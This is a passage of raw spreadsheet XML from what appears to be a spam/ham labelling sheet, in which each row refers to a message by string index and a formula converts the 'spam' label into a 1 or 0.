        <v>5359</v>
      </c>
      <c r="B65" t="s">
        <v>5294</v>
      </c>
      <c r="C65" s="1">
        <f>IF(B65="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A66" t="s">
        <v>5360</v>
      </c>
      <c r="B66" t="s">
        <v>5294</v>
      </c>
      <c r="C66" s="1">
        <f>IF(B66="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A67" t="s">
        <v>5361</v>
      </c>
      <c r="B67" t="s">
        <v>5297</v>
      </c>
      <c r="C67" s="1">
        <f>IF(B67="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="68" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A68" t="s">
        <v>5362</v>
      </c>
      <c r="B68" t="s">
        <v>5294</v>
      </c>
      <c r="C68" s="1">
        <f>IF(B68="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="69" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A69" t="s">
        <v>5363</v>
      </c>
      <c r="B69" t="s">
        <v>5297</v>
      </c>
      <c r="C69" s="1">
        <f>IF(B69="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="70" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A70" t="s">
        <v>5364</v>
      </c>
      <c r="B70" t="s">
        <v>5297</v>
      </c>
      <c r="C70" s="1">
        <f>IF(B70="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="71" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A71" t="s">
        <v>5365</v>
      </c>
      <c r="B71" t="s">
        <v>5294</v>
      </c>
      <c r="C71" s="1">
        <f>IF(B71="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A72" t="s">
        <v>5366</v>
      </c>
      <c r="B72" t="s">
        <v>5294</v>
      </c>
      <c r="C72" s="1">
        <f>IF(B72="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="73" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A73" t="s">
        <v>5367</v>
      </c>
      <c r="B73" t="s">
        <v>5294</v>
      </c>
      <c r="C73" s="1">
        <f>IF(B73="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A74" t="s">
        <v>5368</v>
      </c>
      <c r="B74" t="s">
        <v>5294</v>
      </c>
      <c r="C74" s="1">
        <f>IF(B74="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="75" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A75" t="s">
        <v>5369</v>
      </c>
      <c r="B75" t="s">
        <v>5294</v>
      </c>
      <c r="C75" s="1">
        <f>IF(B75="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A76" t="s">
        <v>5370</v>
      </c>
      <c r="B76" t="s">
        <v>5294</v>
      </c>
      <c r="C76" s="1">
        <f>IF(B76="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A77" t="s">
        <v>5371</v>
      </c>
      <c r="B77" t="s">
        <v>5294</v>
      </c>
      <c r="C77" s="1">
        <f>IF(B77="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A78" t="s">
        <v>5372</v>
      </c>
      <c r="B78" t="s">
        <v>5294</v>
      </c>
      <c r="C78" s="1">
        <f>IF(B78="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A79" t="s">
        <v>5373</v>
      </c>
      <c r="B79" t="s">
        <v>5294</v>
      </c>
      <c r="C79" s="1">
        <f>IF(B79="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A80" t="s">
        <v>5374</v>
      </c>
      <c r="B80" t="s">
        <v>5294</v>
      </c>
      <c r="C80" s="1">
        <f>IF(B80="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="81" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A81" t="s">
        <v>5375</v>
      </c>
      <c r="B81" t="s">
        <v>5294</v>
      </c>
      <c r="C81" s="1">
        <f>IF(B81="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="82" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A82" t="s">
        <v>5376</v>
      </c>
      <c r="B82" t="s">
        <v>5294</v>
      </c>
      <c r="C82" s="1">
        <f>IF(B82="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="83" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A83" t="s">
        <v>5377</v>
      </c>
      <c r="B83" t="s">
        <v>5294</v>
      </c>
      <c r="C83" s="1">
        <f>IF(B83="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="84" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A84" t="s">
        <v>5378</v>
      </c>
      <c r="B84" t="s">
        <v>5294</v>
      </c>
      <c r="C84" s="1">
        <f>IF(B84="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="85" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A85" t="s">
        <v>5379</v>
      </c>
      <c r="B85" t="s">
        <v>5294</v>
      </c>
      <c r="C85" s="1">
        <f>IF(B85="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="86" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A86" t="s">
        <v>5380</v>
      </c>
      <c r="B86" t="s">
        <v>5294</v>
      </c>
      <c r="C86" s="1">
        <f>IF(B86="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="87" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A87" t="s">
        <v>5381</v>
      </c>
      <c r="B87" t="s">
        <v>5294</v>
      </c>
      <c r="C87" s="1">
        <f>IF(B87="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="88" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A88" t="s">
        <v>5382</v>
      </c>
      <c r="B88" t="s">
        <v>5294</v>
      </c>
      <c r="C88" s="1">
        <f>IF(B88="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="89" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A89" t="s">
        <v>5383</v>
      </c>
      <c r="B89" t="s">
        <v>5294</v>
      </c>
      <c r="C89" s="1">
        <f>IF(B89="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="90" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A90" t="s">
        <v>5384</v>
      </c>
      <c r="B90" t="s">
        <v>5294</v>
      </c>
      <c r="C90" s="1">
        <f>IF(B90="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="91" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A91" t="s">
        <v>5385</v>
      </c>
      <c r="B91" t="s">
        <v>5294</v>
      </c>
      <c r="C91" s="1">
        <f>IF(B91="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="92" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A92" t="s">
        <v>5386</v>
      </c>
      <c r="B92" t="s">
        <v>5294</v>
      </c>
      <c r="C92" s="1">
        <f>IF(B92="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="93" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A93" t="s">
        <v>5387</v>
      </c>
      <c r="B93" t="s">
        <v>5294</v>
      </c>
      <c r="C93" s="1">
        <f>IF(B93="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="94" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A94" t="s">
        <v>5388</v>
      </c>
      <c r="B94" t="s">
        <v>5294</v>
      </c>
      <c r="C94" s="1">
        <f>IF(B94="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="95" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A95" t="s">
        <v>5389</v>
      </c>
      <c r="B95" t="s">
        <v>5297</v>
      </c>
      <c r="C95" s="1">
        <f>IF(B95="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="96" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A96" t="s">
        <v>5390</v>
      </c>
      <c r="B96" t="s">
        <v>5294</v>
      </c>
      <c r="C96" s="1">
        <f>IF(B96="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="97" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A97" t="s">
        <v>5391</v>
      </c>
      <c r="B97" t="s">
        <v>5297</v>
      </c>
      <c r="C97" s="1">
        <f>IF(B97="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="98" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A98" t="s">
        <v>5392</v>
      </c>
      <c r="B98" t="s">
        <v>5294</v>
      </c>
      <c r="C98" s="1">
        <f>IF(B98="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="99" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A99" t="s">
        <v>5393</v>
      </c>
      <c r="B99" t="s">
        <v>5294</v>
      </c>
      <c r="C99" s="1">
        <f>IF(B99="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A100" t="s">
        <v>5394</v>
      </c>
      <c r="B100" t="s">
        <v>5294</v>
      </c>
      <c r="C100" s="1">
        <f>IF(B100="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A101" t="s">
        <v>5395</v>
      </c>
      <c r="B101" t="s">
        <v>5294</v>
      </c>
      <c r="C101" s="1">
        <f>IF(B101="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A102" t="s">
        <v>5396</v>
      </c>
      <c r="B102" t="s">
        <v>5294</v>
      </c>
      <c r="C102" s="1">
        <f>IF(B102="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A103" t="s">
        <v>5397</v>
      </c>
      <c r="B103" t="s">
        <v>5294</v>
      </c>
      <c r="C103" s="1">
        <f>IF(B103="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A104" t="s">
        <v>5303</v>
      </c>
      <c r="B104" t="s">
        <v>5294</v>
      </c>
      <c r="C104" s="1">
        <f>IF(B104="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A105" t="s">
        <v>5398</v>
      </c>
      <c r="B105" t="s">
        <v>5294</v>
      </c>
      <c r="C105" s="1">
        <f>IF(B105="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A106" t="s">
        <v>5399</v>
      </c>
      <c r="B106" t="s">
        <v>5294</v>
      </c>
      <c r="C106" s="1">
        <f>IF(B106="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A107" t="s">
        <v>5400</v>
      </c>
      <c r="B107" t="s">
        <v>5294</v>
      </c>
      <c r="C107" s="1">
        <f>IF(B107="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A108" t="s">
        <v>5401</v>
      </c>
      <c r="B108" t="s">
        <v>5294</v>
      </c>
      <c r="C108" s="1">
        <f>IF(B108="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A109" t="s">
        <v>5402</v>
      </c>
      <c r="B109" t="s">
        <v>5294</v>
      </c>
      <c r="C109" s="1">
        <f>IF(B109="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A110" t="s">
        <v>5403</v>
      </c>
      <c r="B110" t="s">
        <v>5294</v>
      </c>
      <c r="C110" s="1">
        <f>IF(B110="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A111" t="s">
        <v>5404</v>
      </c>
      <c r="B111" t="s">
        <v>5294</v>
      </c>
      <c r="C111" s="1">
        <f>IF(B111="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A112" t="s">
        <v>5405</v>
      </c>
      <c r="B112" t="s">
        <v>5294</v>
      </c>
      <c r="C112" s="1">
        <f>IF(B112="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A113" t="s">
        <v>5406</v>
      </c>
      <c r="B113" t="s">
        <v>5294</v>
      </c>
      <c r="C113" s="1">
        <f>IF(B113="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A114" t="s">
        <v>5407</v>
      </c>
      <c r="B114" t="s">
        <v>5294</v>
      </c>
      <c r="C114" s="1">
        <f>IF(B114="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A115" t="s">
        <v>5408</v>
      </c>
      <c r="B115" t="s">
        <v>5297</v>
      </c>
      <c r="C115" s="1">
        <f>IF(B115="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A116" t="s">
        <v>5409</v>
      </c>
      <c r="B116" t="s">
        <v>5294</v>
      </c>
      <c r="C116" s="1">
        <f>IF(B116="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A117" t="s">
        <v>5410</v>
      </c>
      <c r="B117" t="s">
        <v>5294</v>
      </c>
      <c r="C117" s="1">
        <f>IF(B117="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A118" t="s">
        <v>5411</v>
      </c>
      <c r="B118" t="s">
        <v>5297</v>
      </c>
      <c r="C118" s="1">
        <f>IF(B118="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A119" t="s">
        <v>5412</v>
      </c>
      <c r="B119" t="s">
        <v>5294</v>
      </c>
      <c r="C119" s="1">
        <f>IF(B119="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A120" t="s">
        <v>5413</v>
      </c>
      <c r="B120" t="s">
        <v>5294</v>
      </c>
      <c r="C120" s="1">
        <f>IF(B120="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A121" t="s">
        <v>5414</v>
      </c>
      <c r="B121" t="s">
        <v>5297</v>
      </c>
      <c r="C121" s="1">
        <f>IF(B121="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A122" t="s">
        <v>5415</v>
      </c>
      <c r="B122" t="s">
        <v>5297</v>
      </c>
      <c r="C122" s="1">
        <f>IF(B122="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A123" t="s">
        <v>5416</v>
      </c>
      <c r="B123" t="s">
        <v>5294</v>
      </c>
      <c r="C123" s="1">
        <f>IF(B123="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A124" t="s">
        <v>5417</v>
      </c>
      <c r="B124" t="s">
        <v>5297</v>
      </c>
      <c r="C124" s="1">
        <f>IF(B124="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A125" t="s">
        <v>5418</v>
      </c>
      <c r="B125" t="s">
        <v>5294</v>
      </c>
      <c r="C125" s="1">
        <f>IF(B125="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A126" t="s">
        <v>5419</v>
      </c>
      <c r="B126" t="s">
        <v>5294</v>
      </c>
      <c r="C126" s="1">
        <f>IF(B126="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A127" t="s">
        <v>5420</v>
      </c>
      <c r="B127" t="s">
        <v>5294</v>
      </c>
      <c r="C127" s="1">
        <f>IF(B127="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A128" t="s">
        <v>5421</v>
      </c>
      <c r="B128" t="s">
        <v>5294</v>
      </c>
      <c r="C128" s="1">
        <f>IF(B128="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A129" t="s">
        <v>5422</v>
      </c>
      <c r="B129" t="s">
        <v>5294</v>
      </c>
      <c r="C129" s="1">
        <f>IF(B129="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A130" t="s">
        <v>5423</v>
      </c>
      <c r="B130" t="s">
        <v>5294</v>
      </c>
      <c r="C130" s="1">
        <f>IF(B130="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A131" t="s">
        <v>5424</v>
      </c>
      <c r="B131" t="s">
        <v>5294</v>
      </c>
      <c r="C131" s="1">
        <f>IF(B131="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A132" t="s">
        <v>5425</v>
      </c>
      <c r="B132" t="s">
        <v>5294</v>
      </c>
      <c r="C132" s="1">
        <f>IF(B132="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A133" t="s">
        <v>5426</v>
      </c>
      <c r="B133" t="s">
        <v>5294</v>
      </c>
      <c r="C133" s="1">
        <f>IF(B133="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A134" t="s">
        <v>5427</v>
      </c>
      <c r="B134" t="s">
        <v>5294</v>
      </c>
      <c r="C134" s="1">
        <f>IF(B134="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A135" t="s">
        <v>5428</v>
      </c>
      <c r="B135" t="s">
        <v>5297</v>
      </c>
      <c r="C135" s="1">
        <f>IF(B135="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A136" t="s">
        <v>5429</v>
      </c>
      <c r="B136" t="s">
        <v>5297</v>
      </c>
      <c r="C136" s="1">
        <f>IF(B136="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A137" t="s">
        <v>5430</v>
      </c>
      <c r="B137" t="s">
        <v>5294</v>
      </c>
      <c r="C137" s="1">
        <f>IF(B137="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A138" t="s">
        <v>5431</v>
      </c>
      <c r="B138" t="s">
        <v>5294</v>
      </c>
      <c r="C138" s="1">
        <f>IF(B138="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A139" t="s">
        <v>5432</v>
      </c>
      <c r="B139" t="s">
        <v>5294</v>
      </c>
      <c r="C139" s="1">
        <f>IF(B139="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A140" t="s">
        <v>5433</v>
      </c>
      <c r="B140" t="s">
        <v>5297</v>
      </c>
      <c r="C140" s="1">
        <f>IF(B140="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A141" t="s">
        <v>5434</v>
      </c>
      <c r="B141" t="s">
        <v>5294</v>
      </c>
      <c r="C141" s="1">
        <f>IF(B141="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A142" t="s">
        <v>5435</v>
      </c>
      <c r="B142" t="s">
        <v>5294</v>
      </c>
      <c r="C142" s="1">
        <f>IF(B142="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A143" t="s">
        <v>5436</v>
      </c>
      <c r="B143" t="s">
        <v>5294</v>
      </c>
      <c r="C143" s="1">
        <f>IF(B143="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A144" t="s">
        <v>5437</v>
      </c>
      <c r="B144" t="s">
        <v>5294</v>
      </c>
      <c r="C144" s="1">
        <f>IF(B144="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A145" t="s">
        <v>5438</v>
      </c>
      <c r="B145" t="s">
        <v>5294</v>
      </c>
      <c r="C145" s="1">
        <f>IF(B145="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A146" t="s">
        <v>5439</v>
      </c>
      <c r="B146" t="s">
        <v>5294</v>
      </c>
      <c r="C146" s="1">
        <f>IF(B146="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A147" t="s">
        <v>5440</v>
      </c>
      <c r="B147" t="s">
        <v>5294</v>
      </c>
      <c r="C147" s="1">
        <f>IF(B147="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A148" t="s">
        <v>5441</v>
      </c>
      <c r="B148" t="s">
        <v>5297</v>
      </c>
      <c r="C148" s="1">
        <f>IF(B148="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A149" t="s">
        <v>5442</v>
      </c>
      <c r="B149" t="s">
        <v>5294</v>
      </c>
      <c r="C149" s="1">
        <f>IF(B149="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A150" t="s">
        <v>5443</v>
      </c>
      <c r="B150" t="s">
        <v>5294</v>
      </c>
      <c r="C150" s="1">
        <f>IF(B150="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A151" t="s">
        <v>5444</v>
      </c>
      <c r="B151" t="s">
        <v>5294</v>
      </c>
      <c r="C151" s="1">
        <f>IF(B151="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A152" t="s">
        <v>5445</v>
      </c>
      <c r="B152" t="s">
        <v>5294</v>
      </c>
      <c r="C152" s="1">
        <f>IF(B152="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A153" t="s">
        <v>5446</v>
      </c>
      <c r="B153" t="s">
        <v>5294</v>
      </c>
      <c r="C153" s="1">
        <f>IF(B153="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A154" t="s">
        <v>5447</v>
      </c>
      <c r="B154" t="s">
        <v>5294</v>
      </c>
      <c r="C154" s="1">
        <f>IF(B154="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A155" t="s">
        <v>5303</v>
      </c>
      <c r="B155" t="s">
        <v>5294</v>
      </c>
      <c r="C155" s="1">
        <f>IF(B155="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A156" t="s">
        <v>5448</v>
      </c>
      <c r="B156" t="s">
        <v>5294</v>
      </c>
      <c r="C156" s="1">
        <f>IF(B156="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A157" t="s">
        <v>5449</v>
      </c>
      <c r="B157" t="s">
        <v>5294</v>
      </c>
      <c r="C157" s="1">
        <f>IF(B157="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A158" t="s">
        <v>5450</v>
      </c>
      <c r="B158" t="s">
        <v>5294</v>
      </c>
      <c r="C158" s="1">
        <f>IF(B158="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A159" t="s">
        <v>5451</v>
      </c>
      <c r="B159" t="s">
        <v>5294</v>
      </c>
      <c r="C159" s="1">
        <f>IF(B159="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A160" t="s">
        <v>5452</v>
      </c>
      <c r="B160" t="s">
        <v>5297</v>
      </c>
      <c r="C160" s="1">
        <f>IF(B160="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A161" t="s">
        <v>5453</v>
      </c>
      <c r="B161" t="s">
        <v>5297</v>
      </c>
      <c r="C161" s="1">
        <f>IF(B161="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A162" t="s">
        <v>5454</v>
      </c>
      <c r="B162" t="s">
        <v>5294</v>
      </c>
      <c r="C162" s="1">
        <f>IF(B162="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A163" t="s">
        <v>5455</v>
      </c>
      <c r="B163" t="s">
        <v>5294</v>
      </c>
      <c r="C163" s="1">
        <f>IF(B163="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A164" t="s">
        <v>5456</v>
      </c>
      <c r="B164" t="s">
        <v>5294</v>
      </c>
      <c r="C164" s="1">
        <f>IF(B164="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A165" t="s">
        <v>5457</v>
      </c>
      <c r="B165" t="s">
        <v>5297</v>
      </c>
      <c r="C165" s="1">
        <f>IF(B165="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A166" t="s">
        <v>5458</v>
      </c>
      <c r="B166" t="s">
        <v>5297</v>
      </c>
      <c r="C166" s="1">
        <f>IF(B166="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A167" t="s">
        <v>5459</v>
      </c>
      <c r="B167" t="s">
        <v>5294</v>
      </c>
      <c r="C167" s="1">
        <f>IF(B167="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A168" t="s">
        <v>5460</v>
      </c>
      <c r="B168" t="s">
        <v>5297</v>
      </c>
      <c r="C168" s="1">
        <f>IF(B168="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A169" t="s">
        <v>5461</v>
      </c>
      <c r="B169" t="s">
        <v>5294</v>
      </c>
      <c r="C169" s="1">
        <f>IF(B169="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A170" t="s">
        <v>5462</v>
      </c>
      <c r="B170" t="s">
        <v>5294</v>
      </c>
      <c r="C170" s="1">
        <f>IF(B170="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A171" t="s">
        <v>5463</v>
      </c>
      <c r="B171" t="s">
        <v>5294</v>
      </c>
      <c r="C171" s="1">
        <f>IF(B171="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A172" t="s">
        <v>5464</v>
      </c>
      <c r="B172" t="s">
        <v>5294</v>
      </c>
      <c r="C172" s="1">
        <f>IF(B172="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="173" spans="1:3" x14ac:dyDescent="0.3">
